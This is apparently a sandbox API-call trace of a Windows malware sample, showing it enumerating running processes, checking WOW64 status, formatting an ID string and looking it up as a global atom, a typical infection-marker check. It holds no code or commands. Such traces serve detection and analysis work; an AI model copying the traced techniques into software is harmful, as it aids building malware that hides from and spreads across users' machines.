	[0126.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.295] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.295] CloseHandle (hObject=0x69c) returned 1
	[0126.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d428, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.296] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.296] CloseHandle (hObject=0x69c) returned 1
	[0126.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.296] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.296] CloseHandle (hObject=0x69c) returned 1
	[0126.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d368, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0126.296] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.296] CloseHandle (hObject=0x69c) returned 1
	[0126.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0126.297] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.297] CloseHandle (hObject=0x69c) returned 1
	[0126.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d428, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.297] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.297] CloseHandle (hObject=0x69c) returned 1
	[0126.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.298] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.298] CloseHandle (hObject=0x69c) returned 1
	[0126.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.298] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.298] CloseHandle (hObject=0x69c) returned 1
	[0126.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d2c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.298] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.299] CloseHandle (hObject=0x69c) returned 1
	[0126.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d248, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.299] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.299] CloseHandle (hObject=0x69c) returned 1
	[0126.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.299] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.299] CloseHandle (hObject=0x69c) returned 1
	[0126.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.300] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.300] CloseHandle (hObject=0x69c) returned 1
	[0126.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b97a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0126.300] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.300] CloseHandle (hObject=0x69c) returned 1
	[0126.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.300] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.300] CloseHandle (hObject=0x69c) returned 1
	[0126.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.301] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.301] CloseHandle (hObject=0x69c) returned 1
	[0126.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d548, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.301] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.301] CloseHandle (hObject=0x69c) returned 1
	[0126.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.301] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.301] CloseHandle (hObject=0x69c) returned 1
	[0126.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d248, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.302] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.302] CloseHandle (hObject=0x69c) returned 1
	[0126.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0126.302] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.302] CloseHandle (hObject=0x69c) returned 1
	[0126.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b97a8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0126.303] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.303] CloseHandle (hObject=0x69c) returned 1
	[0126.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.303] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetLastError () returned 0x5
	[0126.304] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.304] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0126.304] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.305] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.306] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetLastError () returned 0x5
	[0126.307] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.307] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0126.307] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.307] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0126.308] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0126.308] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0126.308] CloseHandle (hObject=0x69c) returned 1
	[0126.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0126.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.308] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.308] CloseHandle (hObject=0x69c) returned 1
	[0126.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.309] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.309] CloseHandle (hObject=0x69c) returned 1
	[0126.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.309] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.309] CloseHandle (hObject=0x69c) returned 1
	[0126.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.309] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.309] CloseHandle (hObject=0x69c) returned 1
	[0126.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5970, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0126.310] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.310] CloseHandle (hObject=0x69c) returned 1
	[0126.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d368, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0126.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.347] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.347] CloseHandle (hObject=0x69c) returned 1
	[0126.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d4a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.348] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.348] CloseHandle (hObject=0x69c) returned 1
	[0126.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d248, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0126.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.349] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.349] CloseHandle (hObject=0x69c) returned 1
	[0126.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.349] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.349] CloseHandle (hObject=0x69c) returned 1
